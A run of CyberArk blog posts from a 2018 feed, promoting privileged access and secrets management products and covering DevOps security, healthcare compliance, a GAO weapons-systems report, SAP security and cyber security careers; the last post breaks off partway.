KuppingerCole has just released a new report Security for DevOps and Agile IT: Preventing attacks in highly dynamic environments.”  Authored by Martin Kuppinger and published in October 2018, the report addresses many of the key topics that security practitioners, security leaders and development team leads exploring the need for increasing the security of DevOps environments likely need to address.

Expanded Attack Surface

Organizations are discovering that as the use and adoption of DevOps and Agile IT has increased, securing these environments has become an increasingly important priority. In fact, in just a few years DevOps has changed how IT operates, and most importantly for security professionals, the increased use of micro-services, together with the increased number of DevOps tools used in the CI/CD pipeline, has expanded the attack surface relative to more traditional development environments. The four major drivers expanding the attack surface include:

  1. More secrets
  2. More components
  3. Increased volatility
  4. Increased scale

Top Requirements

The top requirements for securing an organization’s DevOps environment include factors such as the ability to:

  • Consistently manage all types of secrets.
  • Avoid islands of security or reliance on the native capabilities of standalone tools.
  • Focus on simplicity and ease of use for developers.
  • Establish a robust tamper-proof audit capability.
  • Integrate with the organization’s existing Privileged Access Security (or privileged access management to use KuppingerCole’s terminology) infrastructure.

Mapping DevOps Security Needs with Existing Investments in Privileged Access Security

Security teams wrestling with how DevOps security fits within the organization’s broader Privileged Access Security environment should find the insights particularly interesting. For example, existing solutions alone are likely not adequate for securing Agile IT and DevOps environments. They simply don’t meet the requirements necessary for securing a typical, highly dynamic DevOps environment. Instead specialized security solutions are needed to secure DevOps environments, in addition to the existing privileged access security solutions the organization has deployed. However, rather than two separate systems, some form of integrated solution is required.

Action Plan for Securing Secrets

Most importantly, the report outlines an action plan for securing secrets and credentials in DevOps and Agile IT environments and highlights the importance of:

  • Making it easy for developers to secure their applications and code.
  • Isolating APIs so that security services can be refreshed and changed without requiring changes to code.
  • Providing an integrated view and ability to manage privilege and secrets.
  • Capturing and monitoring events by integrating with SIEM and other security systems.

A full copy of the report is available here. For more information on CyberArk solutions, including CyberArk Conjur for securing DevOps environments, visit cyberark.com/conjur. CyberArk Conjur is also available as open source at conjur.org – the open source version enables developers to rapidly gain experience using a powerful secrets management solution.

]]>
The Role of Privileged Access in Healthcare Security and Compliance https://www.cyberark.com/blog/the-role-of-privileged-access-in-healthcare-security-and-compliance/ Mon, 29 Oct 2018 14:59:46 +0000 https://www.cyberark.com/?p=30189/

The increased use of electronic personal health information (ePHI) coupled with rapid advances in healthcare technology – from cloud-based applications to IoT-enabled devices to telemedicine – has created complex healthcare delivery networks that are target-rich environments for cyber attackers.

Outdated and unsupported software, a massive cyber security skills shortage and rapidly evolving technology have left hospitals and healthcare systems vulnerable to ransomware and internal threats to ePHI – both malicious and those resulting from human error. All the while, regulations around ePHI, such as HIPAA HITECH and GDPR, continue to increase while non-compliance is bringing stiffer penalties, particularly with regard to privileged access management.

According to Verizon, “58% of incidents involved insiders—healthcare is the only industry in which internal actors are the biggest threat to an organization. However, the attack vectors are expansive in healthcare. When it comes to privileged access, you have to consider all of the human points of access, including people with administrator rights, along with non-human access – including the applications and medical devices that interact with critical systems and enable fundamental processes such as integrating patient diagnostic data from third-party services or seeking reimbursement from a payer organization.

Managing access to privileged accounts, credentials and secrets is an effective way to limit the moves a threat actor can make after they establish a foothold on the network. With privileged access security measures in place, an attacker’s ability to escalate privileges and move laterally to access sensitive systems will be minimized. Proper cyber security hygiene in an environment where the stakes are so high is absolutely critical. This starts with effectively managing privileged access.

The Current Healthcare Environment

Innovation continues to introduce new technologies that improve patient care, but could leave organizations at risk. With ePHI now being dispersed across expansive networks of patient monitoring devices, mobile endpoints for employees and self-service patient web portals, the risk to healthcare providers continues to evolve. Only those organizations that take a holistic approach to securing their environments – including correct privileged access control – will reduce the risk of a catastrophic cyber security incident.

Building “high walls” to protect an organization’s perimeter is an outdated approach to security. According to the CyberArk Global Advanced Threat Landscape Report 2018, 52 percent of healthcare IT decision-makers cannot prevent attackers from breaking into their networks, and 59 percent believe that customers’ personally identifiable information (PII) could be at risk. Therefore, we challenge organizations to assume that a breach will happen and to implement security tools that prevent an attacker from gaining access to sensitive systems.

 Tightening Regulations and Harsher Penalties

As ransomware and other cyber attacks continue at an alarming rate, IT organizations face an increasingly tight regulatory environment. Strong privileged access security (or the lack thereof) can make or break a healthcare organization’s ability to demonstrate compliance and avoid financial penalties. This was illustrated last year, when Florida-based Memorial Healthcare Systems (MHS) agreed to pay the U.S. Department of Health and Human Services (HHS) $5.5 million to settle violations of HIPAA HITECH rules. This fine was a result of failure to review access controls and examine audit logs, giving unauthorized employees access to ePHI through shared login credentials.

The following diagram from HIPAA Journal outlines the potential penalties healthcare organizations face for non-compliance with HIPPA HITECH. As evidenced in the MHS case, penalties for “willful neglect” can reach millions, and under certain conditions, penalties can now extend to third-party contractors and business associates.

SOURCE: HIPAA JOURNAL (https://www.hipaajournal.com/hipaa-violation-fines/)

Beyond these regulatory penalties, there are significant operational costs to recover from a data breach. A Ponemon study found that a healthcare data breach costs on average $380 per record – more than 2.5 times the global average across industries.

To demonstrate compliance with HIPAA HITECH, GDPR and other industry regulations, healthcare providers must have access to documented, auditable proof of their efforts to protect privileged access. Audit trails require a solution that enables comprehensive monitoring, recording and isolation of all privileged user sessions, detailed activity reports on critical ePHI databases and applications, fully searchable audit logs, and complete, multi-layered audit trail data protection.

 Protecting Your Integrated Care Delivery Network Investment with CyberArk

Organizations must manage privileges to proactively protect against, detect and respond to attacks in progress before attackers compromise vital systems and data. But managing privileges does not mean denying them. Instead, it is a matter of controlling who has access to what and why. Managing privileged access is a part of basic cyber security hygiene and can have a huge, positive impact on an organization’s security posture and compliance efforts.

Because privileged access security complements existing security tools, it helps organizations leverage their existing cyber security investments towards demonstrable improvements. Privileged access security is an essential first step in maturing healthcare cyber security program and must be a priority.

The CyberArk Privileged Access Security Solution provides proactive, automated, end-to-end detection and protection for all privileged access to systems containing ePHI. Privileged threat detection and analytics provides the ability to respond and remediate to any anomalous or high-risk activities. Monitoring the behavior of privileged activity to ensure users are not disabling, circumventing or altering implemented security safeguards and controls is not only a best practice but often required by regulations.

An enterprise architect at a major public research university health system commented, “Our systems are critical to patient care. Compromised account credentials or compromised applications can lead to PHI/PII exposure and/or outages to patient care systems. The CyberArk Privileged Access Security Solution gives us the ability to expose and understand where our risks are, allowing us to take steps to secure things better.”

To learn more about how CyberArk can help your healthcare organization protect its investments, simplify compliance and continue to deliver the highest quality patient care, read more on our website here.

]]>
The Privileged Access Problem: GAO Report Points to Vulnerabilities in Pentagon’s Advanced Weapon Systems https://www.cyberark.com/blog/the-privileged-access-problem-gao-report-points-to-vulnerabilities-in-pentagons-advanced-weapon-systems/ Fri, 26 Oct 2018 13:02:10 +0000 https://www.cyberark.com/?p=30182/

The Government Accountability Office (GAO) recently released a scathing report highlighting the critical vulnerabilities that malicious attackers could exploit to take complete control of Defense Department advanced weapon systems. Many of the findings point to poor privileged access security practices – a major underlying problem that has long existed throughout federal IT infrastructure.

The failure to secure privileged access is at the heart of the most damaging security breaches. It’s absolutely critical that agencies and the organizations they do business with lock down privileged access, which includes credentials and accounts.

I wrote a piece for GCN outlining three steps agencies should take to better protect their most sensitive credentials and strengthen their overall security posture. Following are some excerpts:

  • Admit there’s a problem. In the last three years, the GAO has issued multiple reports that indicated an agency or system had pervasive problems with privileged access security. The Office of Management and Budget (OMB) issued its own report in April in partnership with the Department of Homeland Security (DHS), revealing that only 55 percent of agencies limit access based on user attributes and roles – and only 57 percent review and track administrative privileges at all. The first step to better security is understanding – and admitting – there’s a problem. Then taking action.
  • Change default passwords. Default passwords are the factory-set passwords for the administrative accounts of a system. They exist so that developers and administrators can easily set up a technology ‘out of the box,’ and they exist everywhere – on home routers, networked printers and even advanced weapon systems. The Pentagon used off-the-shelf and open-source software with default passwords, but never changed them. As the GAO testers found out, default passwords are typically easy to find through a simple internet search – which mean that not changing them is a failure of basic security hygiene.
  • Secure near-siders. While the Pentagon was able to prevent exploitation of the weapon system from remote users, it struggled in stopping potential insiders and near-siders (contractors and third parties who function as an insider with the same privileged access as someone inside the organization). Attackers seek both insider and near-siders to steal their access credentials and then escalate privileges until they’re able to take control of a system.

Establishing a strong security posture starts with ensuring good cyber hygiene, and securing these known vulnerabilities is a must. The privileged access problem is a clear and present threat, and the government simply can’t afford to wait for disaster to strike before addressing it.

Editor’s Note: Read the full GCN piece to delve deeper into the GAO report’s findings and explore ways agencies and government organizations can address the privileged access problem.

]]>
Privileged Session Manager for Cloud: Quite Possibly the Greatest Thing Since Sliced Bread https://www.cyberark.com/blog/privileged-session-manager-for-cloud-quite-possibly-the-greatest-thing-since-sliced-bread/ Thu, 25 Oct 2018 18:44:11 +0000 https://www.cyberark.com/?p=30174/

Editor’s Note: Privileged Session Manager for Cloud is now available as Privileged Session Manager for Web.

When first introduced, sliced bread delivered a new level of efficiency and revolutionized the kitchen for the average American family. It was positioned as “the greatest forward step in the baking industry since bread was wrapped.” Simply put, automating a very uncomplicated process immediately made people’s lives easier, enabling them to be more productive and focus their attention on more important things. A woman penned a letter to the New York Times back in the early 1940s stating the following:

“I should like to let you know how important sliced bread is to the morale and saneness of a household. My husband and four children are all in a rush during and after breakfast. Without ready-sliced bread I must do the slicing for toast—two pieces for each one—that’s ten. For their lunches I must cut by hand at least twenty slices, for two sandwiches apiece. Afterward I make my own toast. Twenty-two slices of bread to be cut in a hurry!

Large enterprises searching for ways to become more operationally efficient while at the same time saving a bit of dough (pun), have naturally turned to the cloud to fuel digital transformation. We continue to see the shift from traditional on-premises infrastructure and applications to cloud and Software-as-a-Service (SaaS) platforms, with organizations aiming to take advantage of the agility and cost savings delivered by as-a-service approaches.

Cloud computing usage is no longer limited to things such as disaster recovery, business continuity, record retention or test and dev. It has expanded and evolved to include more mission and business-critical applications that help drive the success of the business. To realize these benefits, many organizations today exist in a hybrid model that requires integrating disparate cloud platforms, services and applications, and this presents a new set of enterprise-level challenges. To adequately protect this increasingly complex network of applications and systems, organizations also need a unified privileged access security approach to reduce risk from external attackers and malicious insiders, while maximizing operational efficiency and end-user productivity.

Introducing CyberArk Privileged Session Manager for Cloud

We are happy to announce our version of the greatest thing since sliced bread. We know it’s the most overused hyperbole to describe innovation, but this time, it’s truly the case as it relates to operational efficiency and security.

Here’s why.

Over the past year, CyberArk has made an orchestrated effort to simplify the way privileged access security is delivered and experienced. Privileged Session Manager for Cloud, part of the CyberArk Core Privileged Access Security Solution, takes it one step further by enabling our customers to: deliver ease of access and security without compromise, bridge the gap between operational challenges and experience a sound security posture.

Cloud administrators and privileged business users may not have to tediously cut 22 slices of bread as part of their daily routine – but – they face many other obstacles in performing their jobs, such as console fatigue as they try to enforce security policies across a growing number of systems. CyberArk takes this burden away, making access both easy and secure. Secure access is implemented transparently for the end user with no change to the application required. In fact, end users can experience a 3X faster connection to cloud platforms and web applications compared to traditional session management solutions. Additionally, this milestone makes CyberArk the first and only privileged access security vendor to deliver native access for cloud platforms, SaaS and social media applications that no other vendor can match.

Watch demo video:

 

Security and audit teams now have complete visibility of cloud admin and privileged user activities. The solution provides an application-aware architecture that can observe user interactions within both cloud platforms and web applications, detect and alert on potential attacks in the event of high-risk or malicious activity, and create a detailed audit of all session activities. Through integration with Privileged Threat Analytics, the solution’s customizable risk scoring allows organizations to pre-define high-risk activity and assign it to privileged activity in real time. By assigning risk-based scoring to privileged sessions, audit teams can prioritize and streamline the audit review process based on risk versus randomly reviewing privileged sessions in hopes of catching something high-risk or malicious. The solution provides a single pane of glass view to prevent and detect attacks involving privileged access across on-premises, hybrid and cloud environments; and also integrates with leading Security Information and Event Management (SIEM) platforms.

Take the Next Step Forward in Securing Privileged Access

The best part about announcing Privileged Session Manager for Cloud is that it’s a free and complimentary solution for all existing customers with Core Privileged Access Security user licenses! For full release details, existing customers can access the release notes and download Privileged Session Manager for Cloud directly from the CyberArk Support Vault.

₁Forrester, Sue (January 26, 1943). “Ready-Sliced Bread Favored”. The New York Times. p. 8.
]]>
ERP Attacks Are On The Rise: Protect Against Insider Threats and External Attacks Across Business Critical Systems https://www.cyberark.com/blog/erp-attacks-are-on-the-rise-protect-against-insider-threats-and-external-attacks-across-business-critical-systems/ Tue, 23 Oct 2018 13:56:11 +0000 https://www.cyberark.com/?p=30143/

Organizations rely heavily on Enterprise Resource Planning (ERP) systems and applications to power their businesses, manage critical processes (product lifecycle management, customer relationship management, supply chain management, etc.) and ensure a continuous, open flow of information. The ubiquity of these systems and business critical applications means the potential to compromise data and expose organizations to compliance and regulatory consequences is greater than ever before.

Earlier this year, US-CERT and others warned organizations worldwide about ongoing and eminent cyber attacks targeting ERP applications. Reuters reported that ERP systems across numerous media, energy and finance organizations were hit after they failed to install patches or take other security measures. Criminal hackers are not the only ones targeting these systems. Nation-state sponsored attackers also target ERP systems and applications for cyber espionage and sabotage, as evidenced in the high-profile United States Information Service (USIS) breach.

It’s easy to understand why these types of attacks are on the rise. ERP systems and applications house sensitive, business-critical data that is highly attractive to attackers. They are also pervasive, touching virtually every layer of a business – from infrastructure to operating systems to cloud consoles and more. In these environments, default, generic passwords are rampant, strong authorizations are often shared by multiple employees (such as Admin Groups) and associated passwords are too often widely known throughout the organization. This makes it very difficult to control where powerful credentials are used – and for what purpose. In-Depth Auditing of privileged Logons to such ERP systems is often hard to configure or subject to other challenges like performance issues. Because many of the applications these complex systems support are Internet-facing to facilitate data flow across multiple audiences and third-party entities, attackers constantly find new ways to exploit vulnerabilities to gain privileged access and disrupt operations.

 CyberArk Privileged Access Security Solution for SAP

 Today, more than 91 percent of the Forbes 2000, as well as the most valued global brands and government agencies, rely on enterprise management software leader SAP for the modern business tools needed to run their businesses and help predict the future needs of their customers. As SAP adoption continues to surge, there is a critical need for organizations to reduce the attack vector and manage privileged access. This is strongly evident when you consider that the average damage of an SAP breach is estimated at $5 million – a staggering cost to many organizations.

Although SAP has designed security measures to address common vulnerabilities and security risks, they are primarily based on SAP-specific use cases. These highly complex, high-touch systems require a great deal of time and manual work to maintain proper cyber hygiene – to the tune of 4,000+ security patches – making it nearly impossible for security teams to keep up. As a result, securing privileged access using native SAP tools creates additional operational complexity and often falls short of meeting security and compliance mandates.

 In a recent On the Front Lines webinar, I highlighted CyberArk’s certified integration with SAP, powered by NetWeaver. As the industry’s only SAP-certified solution that helps organizations automatically discover, onboard and secure SAP accounts and credentials across all layers of the enterprise, organizations now have a way to better protect against insider and external attacks across their SAP environments, including SAP ERP systems.

If you missed the live discussion, I invite you to tune in to the on-demand presentation to learn how to stay one step ahead of attackers by:

  • Managing and securing SAP credentials: Strengthen your overall security posture and improve operational efficiencies by onboarding accounts directly into CyberArk. With CyberArk, you can also automate password rotation and enable multi-layered privileged access security controls across the SAP stack – from the application layer to databases, operating system and servers.
  • Reducing privileged access security risk:Quickly detect and halt suspicious activity by monitoring SAP privileged user activity. CyberArk complements SAP’s security controls by managing, protecting and controlling the use of privileged accounts. CyberArk provides a consistent approach to reducing privileged access security risk across the entire enterprise for SAP solutions and other high-value applications and infrastructure.

For additional information check out the CyberArk Marketplace or download our solution brief and whitepaper.

]]>
Overcoming DevOps Security Blind Spots: A Q&A with Forrester’s Chris Condo https://www.cyberark.com/blog/overcoming-devops-security-blind-spots-a-qa-with-forresters-chris-condo/ Wed, 17 Oct 2018 14:11:12 +0000 https://www.cyberark.com/?p=30041/

We recently hosted a webinar, with special guest Chris Condo of Forrester Research, to help security professionals better understand the challenges developers face in the lightning-fast paced DevOps world – and  to explain how they can fully embed themselves into the DevOps process. We received a number of thoughtful questions during the Q&A portion of the webinar. Following are some highlights from this interactive discussion.

Q: Throughout the webinar, we discussed the importance of security taking on a services role. This service responsibility concept is very important as we think about how different groups and multi-disciplinary teams can interact with one another. How you do see service responsibility breaking out for application-level security concerns?

Chris: What the “you write it, you own it” mentality really means is that it’s security’s job to empower the development team by helping them to fully understand what the threats are and educate them – not just on the architecture – but also on how they will host each particular application. They need to understand how it’s going to be secured, how to deploy the code to that machine, etc.

At one time, you might have had a person on the operations team who pushed code out to a server based on a list of written instructions (here’s how to configure the server, here’s how to load the software package, etc.) and expected things to work magically.  But of course, this never works. What’s transformed from that era is that the development team has taken on a true ownership role, because security and infrastructure folks realize that they [the development team] are the ones who truly know the application best.

What I see working best is when development kicks off a project by engaging the security team, saying, “Hey, I’m going to develop this product, it needs to be delivered in six months and I need to get your insights on what we should be doing along each step of the way.”

Q: What should those initial conversations between DevOps and security teams look like?

 Chris: There are a host of questions about what goes into product development that developers don’t necessary know to ask initially. Thereforer, it’s important that security is involved to walk through those questions from the start. For example, the first thing that should be addressed is what kind of data will be stored. Who’s going to use it and, in which geographies? How many people are going to use the product? What kind of technologies are used to build the application? Are contractors involved? Is the product going to being developed in other countries, outside of the United States, for example? Who’s the customer?

Then, as development gets closer to delivery, it’s important to address questions such as, how is the application going to be hosted? What’s that going to take? How many servers are needed? Then, close collaboration with security is necessary to address network security and infrastructure security requirements. Sit down together and have a discussion about how the application is evolving and what needs to happen. Lean on the security team as you would a consultant or advisory team – look to them for best practices and proven advice.

Q: How does automation play into this collaborative approach?

 Chris: Automation makes parts of the code development process more opaque. It means that somebody could insert code that shouldn’t be there. It also allows teams to do things undercover that at one time (when the coding process was manual) would have been very transparent, such as an automated deployment to a test environment.

That’s why it’s so important that the DevOps team (or whoever owns building that DevOps chain) consults with the security team upfront, letting them know what they are doing, showing them which tools require which types of of privileges to run and confirming what needs to happen when a particular CI tool requires admin access, for example. You need to be proactive and start thinking about how to isolate those tools if they can’t be replaced with any other tool, or how to build other types of methodologies, so that the methodology used to build the software is also secure.

Q: Where do you see security budgets, efforts and mandates coming from? Is it coming from within the line of business? Is it more central? And how do you see that playing out in terms of how companies address security problems?

 Chris: What often happens within these distributive models is that everyone adopts the attitude of, “Well, I own my own DevOps tool chain, so I’ll do what I want.” The reason why they feel like they can do that is because they don’t own the responsibility for security or the execution of security principles. They simply leave it to security to be the heavy-handed person who comes in at the end and says, “Oh, hold on a minute, let’s put on the brakes and go through all these checklists.” That’s when you end up in a stand off. Instead, the CIO or CTO should say, “Listen development team, if a security feature goes out the door and you break some sort of policy, it’s on you. You need to be the holders of the security execution.” The security team is going to tell you what you need to do, but it’s your job to get it done.”

Successful teams often establish a center of excellence. They pull experts from various teams – similar to the Spotify Guild strategy – to meet with some frequency and discuss best practices to collaboratively find solutions that can provide both speed and security.

Q: Any closing thoughts?

Chris: An essential first step is getting executive buy-in to the fact that security and development is a joint process and conveying the value of incorporating security upfront and throughout entire development process. The sooner security’s voice is heard, the less expensive the project is actually going to be.

Editors Note: These responses have been edited for clarity and brevity. You can tune in to the webinar recording to watch the full presentation or check out additional highlights in this blog post.

 

]]>
Introducing Privileged Session Manager for the Cloud https://www.cyberark.com/blog/introducing-privileged-session-manager-for-the-cloud/ Mon, 15 Oct 2018 13:03:51 +0000 https://www.cyberark.com/?p=29879/

Editor’s Note: Privileged Session Manager for Cloud is now available as Privileged Session Manager for Web.

As founder and CTO of Vaultive, I’ve worked closely with a team of brilliant engineers over the past 10 years to address the most pressing security issues that prevent enterprises from fully realizing the promise of the cloud – from data security and regulatory compliance concerns to government data access and international data privacy laws.

The idea behind Vaultive’s technology came to me back in 2008. Always fascinated by computer networks and information security challenges, I identified the dawn of cloud computing as a huge challenge to enterprises that have to deal with very sensitive information and operate in regulated industries.

In my role, I had the privilege of running the Israeli development site. We have been through a fascinating and challenging journey together. This wonderful group of people also happens to have some of the sharpest minds I’ve ever had the pleasure of working with.

A guiding principle for me as a security professional has always been that security controls are only effective if they are transparent. End-users need to be efficient and able to get work done. Enterprises that implement security solutions that slow employees down may be improving overall security, but they are ultimately lowering productivity and creating frustrated employees who will look for ways around controls that create yet another set of security risks. We have always believed in empowering users to utilize as many modern devices and applications as they want.

Though many companies have set out to solve the cloud security conundrum, Vaultive approached the challenge with unmatched ambition, industry experience and technical innovation. Our unique technology allowed our clients to enforce policies such as authenticating users and auditing usage in cloud applications while still preserving a seamless, responsive and modern cloud application experience for users. This groundbreaking approach helped risk-conscious IT teams, from Wall Street firms,  Fortune 500 companies, large NGOs and others, move to the cloud securely and with confidence.

Having crossed paths with some of the CyberArk leadership team, I knew this company was different. Many companies build great products, but very few have the special culture that CyberArk does. In March of 2018, CyberArk decided to acquire my team and our technology. I knew we had a great opportunity opportunity ahead of us. There was a rare fit between what Vaultive had produced and the CyberArk product line, but we also knew we had to bring people together and not just technology. Although we were the new guys and gals, we were immediately embraced by CyberArk. The Vaultive and CyberArk teams united seamlessly – across geographies, organizations and product groups – driven by an aligned vision to deliver an effective, proactive and unified security approach that extends from the data center to the cloud. Since March, we have been hard at work fully integrating the Vaultive technology into the CyberArk Privileged Access Security Solution, which I am thrilled to introduce today with the launch of Privileged Session Manager for Cloud.

CyberArk Privileged Session Manager for Cloud, a core component of the CyberArk Privileged Access Security Solution, enables IT security teams to isolate, monitor and control access consistently across multiple cloud platforms and web-based applications – all without changing or hindering the way cloud administrators and privileged business users work.

With Privileged Session Manager for Cloud, security teams can provide transparent access to AWS, Red Hat OpenShift, Salesforce.com, and leading social media platforms – Twitter, LinkedIn, Facebook and Instagram that is 3x faster than traditional session management solutions. Integration with the CyberArk Privileged Access Security Solution’s threat analytics capabilities means that security teams now have visibility into risky activities on these sensitive platforms to help alert on attacks in flight. Detailed audits of admin and privileged user activities means less time spent meeting compliance requirements. All of this translates into a win-win for the security team and for end users!

I’m extremely proud of everything the Vaultive engineering team accomplished from our humble beginnings in our offices in downtown Tel Aviv where we initially had more dogs than human team members. I am also honored to share our first major deliverable as part of the CyberArk family. We look forward to working closely with customers around the world to proactively protect against advanced threats and extend their privileged account security strategies to the cloud.

For more information on Privileged Session Manager for Cloud, I encourage you to check out today’s news announcement, register for our customer webinar or contact your CyberArk representative. Be sure to watch this space – we’ve only just begun!

On a personal note, I feel extremely proud of the what the extended engineering team has achieved over the years. A few days ago we received terrible news about one of our top engineers, Ryan Barberides, tragically passed away. Ryan was a sharp, gentle, intelligent and hard working young man who we all deeply loved. We would not be here without him, and I send my deep condolences to his family and friends. We will all miss you Ryan!

]]>
Cyber Security Awareness Month: Highlights of Three Pathways into a Cyber Career https://www.cyberark.com/blog/cyber-security-awareness-month-highlights-of-three-pathways-into-a-cyber-career/ Fri, 12 Oct 2018 12:58:08 +0000 https://www.cyberark.com/?p=29864/

October is Cyber Security Awareness Month, and this week’s focus is on establishing or building a career in cyber security. There are many paths to consider. People find their way to careers in cyber security from a wide variety of backgrounds. At CyberArk, we have employees with backgrounds in finance, law, systems administration, operations and much more. In fact, many who took a less direct route to their career in cyber security find that the skills they learned along the way are the ones they depend on while working at CyberArk. In this article, we’ll profile three employees.

Noam Liran, National Manager of Federal Engineering and Customer Success at CyberArk, started his career in corporate finance, completed law school and then became a cyber security professional. He credits the perspective on business he got from his corporate finance career and the communication skills from his time at law school for his success in cyber security.

“Critical problem solving is often more important than ones and zeros,” Liran said. He works with CyberArk’s customers, educating them on CyberArk’s products, matching their needs to effective solutions, troubleshooting technical issues and acting as the customer’s main technical point of contact. He explained that when he addresses a room at one of his client’s offices, he’s dealing with a diverse group of people from both technical and business backgrounds.

He said, “You need to be able to address questions from different professionals. It’s hard to do if you can’t relate to them and answer with a level of detail and information that resonates with them.” His background in business helps him connect to the business professionals in ways someone from a straight engineering background often can’t. Liran said, “If you’re focused only on engineering, you lose track of what is important from a business perspective.” Liran’s diverse experience lets him speak to business or technical professionals in their own language.

Communication is key when it comes to working with customers to develop their cyber security capabilities. Liran’s time at law school helps him there.  One of the biggest lessons of law school, according to Liran, is effective communication. A lawyer needs to be able to speak clearly and concisely to a wide variety of people while under pressure. From this, Liran learned how to address people from many different backgrounds, keep clients’ attention and answer even the trickiest of questions.

Liran doesn’t think that a cyber security or computer science degree is the most important thing for a cyber security professional. He said, “The ability to bring in both technical knowledge and communication skills is an effective combo that can make anyone successful.”

Liran stays in cyber security because he’s “making a difference.” He said, “I’m helping someone secure their environment, mitigate risk and lessen the impact of a breach to maintain an operational business and avoid disruptions for customers.”

Jeff Vealey, Customer Success Security Adviser at CyberArk, also loves his job in cyber security because it helps him to protect people. He said, “I really enjoy watching any spy or CIA show. I’ve always wanted to see how the CIA does things. I think that’s the epitome of security.”

Vealey came to cyber security from a career in network operations. He got involved in technology because no one else at his company had technical skills. Figuring out how to implement security at that company was his “trial by fire.” Vealey assists customers around the world, providing guidance on cyber security, solving security problems and helping companies to implement cyber security solutions. With his love of CIA shows, he’s made his specialty helping the federal government.

Vealey said that he sees “curiosity” as the most important trait for a cyber security professional. Curiosity about how things work is part of what makes him good at his job. He said, “I also love to tinker. I like to see if something works; if I throw something at it from another angle, will it still work?”

According to Vealey, cyber security is an exciting field to join now. He said, “It’s a hyper-growing field. There will always be a need for security since someone is always trying to get around it.”

His advice to anyone looking to enter cyber security is: “Don’t be afraid to start in operations.” He explained that cyber security can be a part of any operations job, providing hands-on experience in cyber security programs. Vealey added.

Andy Thompson, National Manager for Customer Success at CyberArk, got hands-on experience with cyber security working in operations and as a systems administrator before he became a cyber security professional. Now, he works with clients, helping them to implement privileged access security solutions, providing guidance on security best practices and consulting on IT risks.

Thompson credits his time as a systems administrator for his success in cyber security. He said, “My time ‘in the trenches’ provides me with credibility. I can relate to the challenges clients deal with because I faced those challenges myself. I feel like it allows me to understand how clients function internally and how to ask the right questions. My experience as a sysadmin is one of the reasons customers view me as a trusted adviser instead of just another vendor.”

Thompson recommends that anyone interested in becoming a cyber security professional, no matter their background, reach out and look for mentors. He said, “My career has been influenced by several people who took an active interest in me and I too have done the same.” He added, “The InfoSec community has always been willing to teach the willing.”

Now is a good time to get involved with cyber security. Thompson said, “Let’s face it, there will always be a need for InfoSec professionals in these crazy times.”

Privileged access security management is a sought after skill set. If you’re interested in learning more, CyberArk offers free training and cyber security resources. You can also check out careers at CyberArk here.

 

]]>
CyberArk Conjur Open Source is Now Available on AWS Marketplace https://www.cyberark.com/blog/cyberark-conjur-open-source-is-now-available-on-aws-marketplace/ Fri, 28 Sep 2018 21:01:55 +0000 https://www.cyberark.com/?p=29121

We’re excited to announce that CyberArk Conjur Open Source is now available as an AMI (Amazon Machine Image) on Amazon Web Services (AWS) Marketplace. Conjur Open Source is a powerful secrets management solution tailored specifically to the unique infrastructure requirements of native cloud, container and DevOps environments.

The availability of Conjur Open Source further expands CyberArk’s offering on AWS Marketplace, which already includes the CyberArk Privileged Access Security Solution.

Integration with AWS IAM Improves Security

Conjur offers powerful integrations with AWS. For example, Conjur can improve AWS workload security by utilizing the native capabilities of AWS Identity and Access Management (IAM) roles for strong authentication and Conjur for policy-based authorization. Since Conjur-defined policies can be applied to pre-defined AWS IAM roles, this approach enables developers and security teams to avoid redoing work, which can slow down the development process. Conjur can authenticate to any of the AWS Principles, including AWS Elastic Compute Cloud (EC2), AWS Elastic Container Service (ECS) instances and AWS Auto Scaling and Lambda functions. As a result, organizations using both AWS and CyberArk can manage access policies more securely across AWS, hybrid, multi-cloud and CI/CD pipelines.

Centralized Solution that Avoids the Limitations of Native Platforms and Tools

Conjur is designed to provide a centralized solution for secrets management, which helps developers to easily and consistently protect secrets, keys, certificates, and authentication data across the CI/CD pipeline, regardless of the varying capabilities of the underlying native tools and environments. Conjur Open Source integrates natively with leading container environments and native tools, including Kubernetes, Red Hat OpenShift and Cloud Foundry, as well as Jenkins, Chef, Puppet and Ansible.

Conjur was designed with ease of use for developers in mind. Its capabilities include machine identity, and policy as code, as well as powerful security features, such as centralized policy-based enforcement, segregation of duties, rotation and monitoring.

Easy to Start Securing Secrets

Conjur Open Source on AWS Marketplace gives developers an easy way to use Conjur to get hands-on experience removing and securing secrets from their code. For example, Conjur lets developers automatically secure secrets in code that uses environmental variables.

Flexible Upgrade to Enterprise-Class Capabilities

Conjur Open Source can be easily upgraded to Conjur Enterprise, which provides all the capabilities of Conjur Open Source plus full access to CyberArk support and can be integrated with the CyberArk Vault. Vault integration allows secrets and credentials managed by the CyberArk Vault to be automatically on-boarded to platforms integrated with Conjur, such as containers managed by Red Hat OpenShift or a Jenkins pipeline, enabling centralized policy-based rotation and audit across the enterprise.

Next Steps

Conjur Open Source is also available as a Kubernetes application on Google Cloud as well as on GitHub and other sites. For more information and tutorials on Conjur Open Source, visit Conjur.org and, for Conjur Enterprise, visit Cyberark.com/Conjur or contact CyberArk Sales.

To learn more about CyberArk support for the AWS community, visit https://www.Cyberark.com/aws/.

]]>
Embracing DevOps: What Security Teams Need to Know https://www.cyberark.com/blog/embracing-devops-what-security-teams-need-to-know/ Tue, 25 Sep 2018 12:55:01 +0000 https://www.cyberark.com/?p=28953

We’ve all read about credentials exposed via GitHub and other repositories. It’s clear organizations have security blind spots in DevOps that need to be addressed. Developers want velocity and too often see security as “getting in the way.” We recently held a webinar, featuring special guest speaker Forrester Senior Analyst Chris Condo, to explore the challenges developers face and collaborative ways security teams can help. Following are some highlights from this presentation.

What Good is Speed Without Security?

Chris shared a story of an organization that releases code within five minutes – from checking it in, running it through an automated process then fully deploying it. This is becoming the norm as development teams feel the pressure to move faster. According to the Forrester Business Technographics Developer Survey 2018, the top priority for 40 percent of software development teams over the next 12 months relates to speed and automation. Additionally, 34 percent of software decision-makers say that introducing or expanding DevOps is a high or critical priority to create and improve customer-focused products faster and more efficiently.

If an organization releases code at breakneck speed and also inadvertently exposes credit card numbers, credentials or PII, what good is speed, really? Forrester’s research underscores this point, indicating that software vulnerabilities (exploits), web applications (SQL injection, cross-site scripting, remote file inclusion), and stolen credential use (logins, encryption keys) are the top three ways that external attacks are carried out.

The Security and Development Disconnect

